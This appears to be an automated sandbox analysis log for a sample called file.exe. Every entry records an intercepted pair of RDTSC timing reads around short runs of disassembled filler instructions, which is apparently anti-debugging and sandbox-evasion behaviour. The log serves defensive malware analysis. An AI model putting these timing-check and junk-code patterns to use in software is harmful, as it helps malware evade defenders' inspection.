Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E33C second address: 115E344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1108205 second address: 110821F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110821F second address: 1108225 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E5EE second address: 115E5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E5F4 second address: 115E601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1165DE8 second address: 1165DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166426 second address: 116644A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pushad 0x00000008 jng 00007F2E050A57C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11666D9 second address: 11666F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2608h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11666F7 second address: 116671D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2E050A57CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F2E050A57CAh 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F2E050A57CAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A23 second address: 1166A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2E044F25F6h 0x0000000a popad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F2E044F2605h 0x00000013 pop edi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b jmp 00007F2E044F2609h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A67 second address: 1166A6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A6D second address: 1166A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A73 second address: 1166A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A79 second address: 1166A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116708D second address: 11670A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F2E050A57C6h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop edi 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11675AD second address: 11675B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C2CD second address: 116C2F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57D8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F2E050A57CAh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F5DC second address: 116F5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F85B second address: 116F895 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2E050A57EFh 0x00000008 jmp 00007F2E050A57D2h 0x0000000d jmp 00007F2E050A57D7h 0x00000012 pushad 0x00000013 jng 00007F2E050A57C6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F895 second address: 116F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FA22 second address: 116FA2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2E050A57C6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FA2D second address: 116FA33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FA33 second address: 116FA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2E050A57C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FBC7 second address: 116FBCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FBCB second address: 116FBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FBDD second address: 116FBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E044F2601h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176007 second address: 117600D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117600D second address: 117602F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2E044F2604h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jp 00007F2E044F25F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176185 second address: 11761A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2E050A57D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11761A4 second address: 11761BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2607h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176464 second address: 1176474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F2E050A57C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176474 second address: 11764C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2604h 0x00000007 jg 00007F2E044F25F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2E044F25FAh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007F2E044F260Fh 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11764C1 second address: 11764D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57CFh 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11764D9 second address: 11764DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11764DF second address: 11764E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117662A second address: 1176634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176634 second address: 117663A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176BC7 second address: 1176BDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176E8F second address: 1176E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176E93 second address: 1176EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E044F25FAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176EA3 second address: 1176EBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 jnp 00007F2E050A57C6h 0x0000000f jnc 00007F2E050A57C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CCEA second address: 117CCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2E044F25F6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CCF5 second address: 117CD08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push edx 0x0000000b jnp 00007F2E050A57C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11805C6 second address: 11805DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2E044F25F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F2E044F25F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11805DC second address: 11805E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAF44 second address: 10BAF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1180896 second address: 11808A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F2E050A57C8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11808A6 second address: 11808AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11808AC second address: 11808D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2E050A57C6h 0x0000000a popad 0x0000000b jmp 00007F2E050A57CEh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jg 00007F2E050A57C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11808D2 second address: 11808D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11808D6 second address: 11808DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11822B5 second address: 11822D7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2E044F25F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F2E044F2604h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1187D95 second address: 1187D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118F3F6 second address: 118F40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2603h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118F40D second address: 118F41D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F2E050A57C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11955D9 second address: 11955DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1195706 second address: 1195710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1195710 second address: 1195715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119E12D second address: 119E141 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2E050A57C6h 0x00000008 jp 00007F2E050A57C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A1001 second address: 11A1005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A1005 second address: 11A1040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CFh 0x00000007 jmp 00007F2E050A57D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F2E050A57CDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A1040 second address: 11A1050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A563D second address: 11A5643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5643 second address: 11A564E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2E044F25F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A564E second address: 11A5663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5663 second address: 11A5673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1325 second address: 11B1329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1329 second address: 11B1343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2606h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1343 second address: 11B1361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2E050A57C6h 0x0000000a jmp 00007F2E050A57D4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1361 second address: 11B1365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B1365 second address: 11B1381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F2E050A57C6h 0x0000000e jmp 00007F2E050A57CEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFC1B second address: 11AFC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFC1F second address: 11AFC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F2E050A57D7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFC41 second address: 11AFC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFEDB second address: 11AFEFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2E050A57C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2E050A57D3h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFEFE second address: 11AFF04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B0093 second address: 11B0097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B0097 second address: 11B009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B009B second address: 11B00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B04B8 second address: 11B04BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B40A4 second address: 11B40CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F2E050A57CAh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F2E050A57CEh 0x00000017 pushad 0x00000018 popad 0x00000019 ja 00007F2E050A57C6h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B40CB second address: 11B40E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E044F2602h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B40E2 second address: 11B40E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B40E7 second address: 11B40ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D1235 second address: 11D1240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2E050A57C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D1240 second address: 11D1246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D1246 second address: 11D125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F2E050A57C8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F2E050A57C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D125F second address: 11D1273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F2E044F25FEh 0x0000000c push edx 0x0000000d pop edx 0x0000000e jng 00007F2E044F25F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D1273 second address: 11D1278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D1278 second address: 11D12AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E044F2602h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F2E044F2606h 0x00000010 popad 0x00000011 js 00007F2E044F2602h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D10C7 second address: 11D10D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3E29 second address: 11D3E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3E2D second address: 11D3E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3E33 second address: 11D3E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F2E044F25FCh 0x0000000c jg 00007F2E044F25F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3E49 second address: 11D3E5E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2E050A57C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnp 00007F2E050A57C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D39BA second address: 11D39F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2605h 0x00000007 jnl 00007F2E044F25F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2E044F2601h 0x00000016 jmp 00007F2E044F25FAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D39F6 second address: 11D3A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2E050A57C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3B5C second address: 11D3B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F2E044F25FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3B69 second address: 11D3B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
